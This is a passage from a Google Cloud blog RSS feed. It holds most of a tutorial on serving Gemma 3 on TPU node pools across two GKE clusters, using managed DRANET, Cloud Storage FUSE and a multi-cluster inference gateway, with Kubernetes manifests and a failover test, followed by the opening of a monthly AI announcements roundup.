&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy two separate GKE clusters in your chosen regions configured.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable the Gateway API (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;--gateway-api=standard&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) and the&lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/cloud-storage-fuse-csi-driver"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Storage FUSE CSI driver&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;--addons GcsFuseCsiDriver&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) during cluster creation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Create dedicated TPU v6e node pools (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ct6e-standard-4t&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) for both clusters.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable managed DRANET on these &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#enable-dra-driver-tpu"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;TPU node pools&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; by setting the flags &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;---accelerator-network-profile=auto&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;--node-labels=cloud.google.com/gke-networking-dra-driver=true&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Next: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Establish the global mesh via Fleet Registration.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Register both GKE clusters to a unified GKE Fleet by following the&lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs/how-to/creating-fleets"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;fleet creation and registration setup&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable Multi-Cluster Service Discovery and Multi-Cluster Ingress on your fleet.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Designate your primary region as the configuration hub to act as the control plane for routing rules across both regions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Next: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy the AI workload.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Use a temporary Kubernetes job to download the Gemma 3 (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gemma-3-27b-it&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) model weights directly into your Cloud Storage bucket.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Define a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ResourceClaimTemplate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; that explicitly requests the managed DRANET device class (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;deviceClassName: netdev.google.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; ) with the allocation mode set to "All".&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: resource.k8s.io/v1\r\nkind: ResourceClaimTemplate\r\nmetadata:\r\n  name: all-netdev\r\n  namespace: default\r\nspec:\r\n  spec:\r\n    devices:\r\n      requests:\r\n      - name: req-netdev\r\n        exactly:\r\n          deviceClassName: netdev.google.com\r\n          allocationMode: All&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d1ddf1f0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy your inference server (e.g. vLLM) on the TPU nodes in both regions. Ensure the pod spec utilizes node selectors for the 2x2 TPU topology, requests exactly 4 TPUs, and mounts the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;netdev&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; claim. This guarantees your pods utilize the dedicated accelerator networking alongside standard Ethernet.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
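&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Pod requirements above could look roughly like the following Deployment. Treat it as a sketch under stated assumptions rather than the exact manifest used in this experiment: the Deployment name, the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gemma-ksa&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; service account, the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;VLLM_TPU_IMAGE&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;BUCKET_NAME&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; placeholders, the model path inside the bucket, and the vLLM arguments are all illustrative. The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;app: gemma-server&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; label, port 8000, and the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;all-netdev&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; template name come from the manifests in this post.&lt;/span&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Sketch only: values marked "assumed" are illustrative, not from the original setup.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: gemma-server                  # assumed name
  namespace: default
spec:
  replicas: 1
  selector:
    matchLabels:
      app: gemma-server               # label selected by the AutoscalingMetric
  template:
    metadata:
      labels:
        app: gemma-server
      annotations:
        gke-gcsfuse/volumes: "true"   # injects the Cloud Storage FUSE sidecar
    spec:
      serviceAccountName: gemma-ksa   # assumed Workload Identity service account
      nodeSelector:
        cloud.google.com/gke-tpu-accelerator: tpu-v6e-slice
        cloud.google.com/gke-tpu-topology: 2x2
      resourceClaims:
      - name: netdev                  # claim generated from the template above
        resourceClaimTemplateName: all-netdev
      containers:
      - name: vllm
        image: VLLM_TPU_IMAGE         # assumed placeholder for a vLLM TPU image
        # Assumed arguments: serve the weights from the mounted bucket on port 8000.
        command: ["vllm", "serve", "/models/gemma-3-27b-it", "--port", "8000", "--tensor-parallel-size", "4"]
        ports:
        - containerPort: 8000
        resources:
          requests:
            google.com/tpu: 4         # all 4 chips of the 2x2 slice
          limits:
            google.com/tpu: 4
          claims:
          - name: netdev              # attaches the DRANET network devices
        volumeMounts:
        - name: model-store
          mountPath: /models
          readOnly: true
      volumes:
      - name: model-store
        csi:
          driver: gcsfuse.csi.storage.gke.io
          readOnly: true
          volumeAttributes:
            bucketName: BUCKET_NAME   # assumed placeholder for your bucket&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Keeping the same labels and port in both clusters matters here, because the gateway resources later in this post select the servers by label and probe them on port 8000.&lt;/span&gt;&lt;/p&gt;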
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Next: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Configure the Multi-Cluster Inference Gateway.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Install the necessary Custom Resource Definitions (CRDs) so Kubernetes can process specialized routing objects like the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;InferenceObjective&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy an &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AutoscalingMetric&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to track hardware utilization, such as KV cache usage.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Use Helm to group the independent AI deployments from both regions into a single, logical &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;InferencePool&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy the Cross-Region Gateway and its associated &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;HTTPRoute&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to manage incoming global traffic.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Apply health checks and backend policies to the pool to ensure load balancing relies on your custom hardware metrics.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Configure an &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;InferenceObjective&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to instruct the gateway to route prompts to the region with the highest availability, avoiding overloaded TPUs.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: gateway.networking.k8s.io/v1\r\nkind: Gateway\r\nmetadata:\r\n  name: cross-region-gateway\r\n  namespace: default\r\nspec:\r\n  gatewayClassName: gke-l7-cross-regional-internal-managed-mc\r\n  addresses:\r\n  - type: networking.gke.io/named-address-with-region\r\n    value: &amp;quot;regions/europe-west4/addresses/gemma-gateway-ip-europe-west4&amp;quot;\r\n  - type: networking.gke.io/named-address-with-region\r\n    value: &amp;quot;regions/us-east5/addresses/gemma-gateway-ip-us-east5&amp;quot;\r\n  listeners:\r\n  - name: http\r\n    protocol: HTTP\r\n    port: 80\r\n---\r\napiVersion: gateway.networking.k8s.io/v1\r\nkind: HTTPRoute\r\nmetadata:\r\n  name: gemma-route\r\n  namespace: default\r\nspec:\r\n  parentRefs:\r\n  - name: cross-region-gateway\r\n    kind: Gateway\r\n  rules:\r\n  - backendRefs:\r\n    - group: networking.gke.io\r\n      kind: GCPInferencePoolImport\r\n      name: gemma-pool\r\n      port: 8000\r\n---\r\napiVersion: networking.gke.io/v1\r\nkind: HealthCheckPolicy\r\nmetadata:\r\n  name: gemma-health-check\r\n  namespace: default\r\nspec:\r\n  targetRef:\r\n    group: networking.gke.io\r\n    kind: GCPInferencePoolImport\r\n    name: gemma-pool\r\n  default:\r\n    config:\r\n      type: HTTP\r\n      httpHealthCheck:\r\n        requestPath: /health\r\n        port: 8000\r\n---\r\napiVersion: networking.gke.io/v1\r\nkind: GCPBackendPolicy\r\nmetadata:\r\n  name: gemma-backend-policy\r\n  namespace: default\r\nspec:\r\n  targetRef:\r\n    group: networking.gke.io\r\n    kind: GCPInferencePoolImport\r\n    name: gemma-pool\r\n  default:\r\n    timeoutSec: 100\r\n    balancingMode: CUSTOM_METRICS\r\n    trafficDuration: LONG\r\n    customMetrics:\r\n      - name: gke.named_metrics.tpu-cache\r\n        dryRun: false\r\n        maxUtilizationPercent: 60\r\n---\r\napiVersion: autoscaling.gke.io/v1beta1\r\nkind: AutoscalingMetric\r\nmetadata:\r\n  name: 
tpu-cache\r\n  namespace: default\r\nspec:\r\n  selector:\r\n    matchLabels:\r\n      app: gemma-server\r\n  endpoints:\r\n  - port: 8000\r\n    path: /metrics\r\n    metrics:\r\n    - name: vllm:kv_cache_usage_perc\r\n      exportName: tpu-cache\r\n---\r\napiVersion: inference.networking.x-k8s.io/v1alpha2\r\nkind: InferenceObjective\r\nmetadata:\r\n  name: gemma-objective\r\n  namespace: default\r\nspec:\r\n  priority: 10\r\n  poolRef:\r\n    name: gemma-pool\r\n    group: &amp;quot;inference.networking.k8s.io&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d1ddfd60&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div data-draftjs-conductor-fragment='{"blocks":[{"key":"5k3m6","text":"Testing the Failover","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":20,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"38ue0","text":"Verify the highly available architecture by simulating a primary region outage. Once the primary deployment is taken offline, the Gateway automatically detects the failure and seamlessly reroutes all subsequent user requests to the active secondary cluster, ensuring continuous availability without dropping traffic.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"44u08","text":"Next Steps","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"3k54t","text":"Take a deeper dive into a hands-on codelab and more information on these features review the following.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"ohd6","text":"Hands-on Codelab: Build multi-cluster GKE Inference Gateway, with TPUs , Cloud Storage FUSE and managed DRANET","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":18,"length":92,"key":0}],"data":{}},{"key":"4jgt1","text":"Document set: DRANET","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":14,"length":6,"key":1}],"data":{}},{"key":"ep7ne","text":"Documentation: AI Hypercomputer","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":15,"length":16,"key":2}],"data":{}},{"key":"3c9h1","text":"Want to ask a question, find out more or share a thought? 
Please connect with me on Linkedin.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":84,"length":8,"key":3}],"data":{}}],"entityMap":{"0":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://codelabs.developers.google.com/codelabs/gke-inference-gateway-multi-cluster-tpus-dranet"}},"1":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/kubernetes-engine/docs/how-to/config-auto-net-for-accelerators"}},"2":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/ai-hypercomputer/docs/overview"}},"3":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://www.linkedin.com/in/ammett/"}}}}'&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="cl1on" data-offset-key="czag4-0-0"&gt;
&lt;h3 class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="czag4-0-0"&gt;&lt;span data-offset-key="czag4-0-0"&gt;Testing the Failover&lt;/span&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="cl1on" data-offset-key="9un4f-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="9un4f-0-0"&gt;&lt;span data-offset-key="9un4f-0-0"&gt;Verify the highly available architecture by simulating a primary region outage. Once the primary deployment is taken offline, the Gateway automatically detects the failure and seamlessly reroutes all subsequent user requests to the active secondary cluster, ensuring continuous availability without dropping traffic.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="ef2kc-0-0"&gt; &lt;/div&gt;
&lt;h2 class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="ef2kc-0-0"&gt;&lt;span data-offset-key="ef2kc-0-0"&gt;Next Steps&lt;/span&gt;&lt;/h2&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="cl1on" data-offset-key="1r2f1-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="1r2f1-0-0"&gt;&lt;span data-offset-key="1r2f1-0-0"&gt;Take a deeper dive into a hands-on codelab and more information on these features review the following.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;ul class="public-DraftStyleDefault-ul" data-offset-key="6fjff-0-0"&gt;
&lt;li class="Draftail-block--unordered-list-item public-DraftStyleDefault-unorderedListItem public-DraftStyleDefault-reset public-DraftStyleDefault-depth0 public-DraftStyleDefault-listLTR" data-block="true" data-editor="cl1on" data-offset-key="6fjff-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="6fjff-0-0"&gt;&lt;span data-offset-key="6fjff-0-0"&gt;Hands-on Codelab: &lt;/span&gt;&lt;a class="TooltipEntity" data-draftail-trigger="true" href="https://codelabs.developers.google.com/codelabs/gke-inference-gateway-multi-cluster-tpus-dranet" rel="noopener" role="button" target="_blank"&gt;&lt;span data-offset-key="6fjff-1-0"&gt;Build multi-cluster GKE Inference Gateway, with TPUs , Cloud Storage FUSE and managed DRANET&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li class="Draftail-block--unordered-list-item public-DraftStyleDefault-unorderedListItem public-DraftStyleDefault-depth0 public-DraftStyleDefault-listLTR" data-block="true" data-editor="cl1on" data-offset-key="9ku8e-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="9ku8e-0-0"&gt;&lt;span data-offset-key="9ku8e-0-0"&gt;Document set: &lt;/span&gt;&lt;a class="TooltipEntity" data-draftail-trigger="true" href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/config-auto-net-for-accelerators" role="button"&gt;&lt;span data-offset-key="9ku8e-1-0"&gt;DRANET&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li class="Draftail-block--unordered-list-item public-DraftStyleDefault-unorderedListItem public-DraftStyleDefault-depth0 public-DraftStyleDefault-listLTR" data-block="true" data-editor="cl1on" data-offset-key="3fjdr-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="3fjdr-0-0"&gt;&lt;span data-offset-key="3fjdr-0-0"&gt;Documentation: &lt;/span&gt;&lt;a class="TooltipEntity" data-draftail-trigger="true" href="https://docs.cloud.google.com/ai-hypercomputer/docs/overview" role="button"&gt;&lt;span data-offset-key="3fjdr-1-0"&gt;AI Hypercomputer&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="cl1on" data-offset-key="f0ecg-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="f0ecg-0-0"&gt;&lt;span data-offset-key="f0ecg-0-0"&gt;Want to ask a question, find out more, or share a thought? Please connect with me on &lt;/span&gt;&lt;a class="TooltipEntity" data-draftail-trigger="true" href="https://www.linkedin.com/in/ammett/" rel="noopener" role="button" target="_blank"&gt;&lt;span data-offset-key="f0ecg-1-0"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;span data-offset-key="f0ecg-2-0"&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;</description><pubDate>Tue, 02 Jun 2026 07:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/developers-practitioners/experimenting-with-tpus-gke-managed-dranet-and-multi-cluster-inference-gateway/</guid><category>Networking</category><category>Developers &amp; Practitioners</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/0-hero-dra.max-600x600.png" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Experimenting with TPUs, GKE Managed DRANET, and Multi-cluster Inference Gateway</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/0-hero-dra.max-600x600.png</image><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/developers-practitioners/experimenting-with-tpus-gke-managed-dranet-and-multi-cluster-inference-gateway/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Ammett Williams</name><title>Developer Relations Engineer</title><department></department><company></company></author></item><item><title>What Google Cloud announced in AI this month</title><link>https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month/</link><description>&lt;div class="block-paragraph"&gt;&lt;p data-block-key="wws10"&gt;&lt;b&gt;&lt;i&gt;Editor’s note&lt;/i&gt;&lt;/b&gt;&lt;i&gt;: Want to keep up with the latest from Google Cloud? Check back here for a monthly recap of our latest updates, announcements, resources, events, learning opportunities, and more.&lt;/i&gt;&lt;/p&gt;&lt;hr/&gt;&lt;p data-block-key="3o743"&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve had a busy month! Between announcing Gemini Spark and Gemini 3.5 at Google I/O and unveiling Google AI Threat Defense, our latest AI-powered cybersecurity solution, we had a lot to share with Google Cloud customers. Keeping up with the latest news takes time, so we gathered the most important announcements, thought leadership, and technical guides in one place to help you quickly catch up.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more about our I/O announcements, here’s &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/innovations-from-google-io-26-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;everything you need to know&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for Google Cloud customers, and &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/startups/startup-news-from-io-and-what-it-means-to-founders?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;top news for startups&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Top announcements&lt;/strong&gt;&lt;/h3&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Introducing Google AI Threat Defense to help you outpace the adversary: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud is introducing Google AI Threat Defense, a comprehensive AI-powered cybersecurity solution and always-on autonomous security platform. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-ai-threat-defense?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini 3.5:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our latest family of models combines frontier intelligence with action – starting with Gemini 3.5 Flash. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Omni:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our new model is a leap forward in world understanding, multimodality, and editing, letting you generate any output from any input, starting with video. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Antigravity: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Antigravity’s expanded capabilities and new integration with Agent Platform bring agentic development to your entire organization.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Spark: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;For Gemini Enterprise and Workspace customers, Gemini Spark is your 24/7 personal AI agent that helps you work more efficiently by autonomously taking action on your behalf, under your direction. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Workspace: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Pics, our new image generation and editing tool, and new voice features in Gmail, Docs and Keep, help reimagine how you work.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed Agents API on Agent Platform:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Allows developers to build and run custom agents inside secure, Google-hosted environments that seamlessly integrate with Agent Platform.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;CodeMender:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A powerful AI security agent provided through Agent Platform, CodeMender can help find and fix vulnerabilities in your code.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Nano Banana 2 and Nano Banana Pro are generally available: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Available today via Gemini Enterprise Agent Platform, organizations are already putting the models to work. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/nano-banana-2-and-nano-banana-pro-are-generally-available?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Thought leadership (editor’s pick): &lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
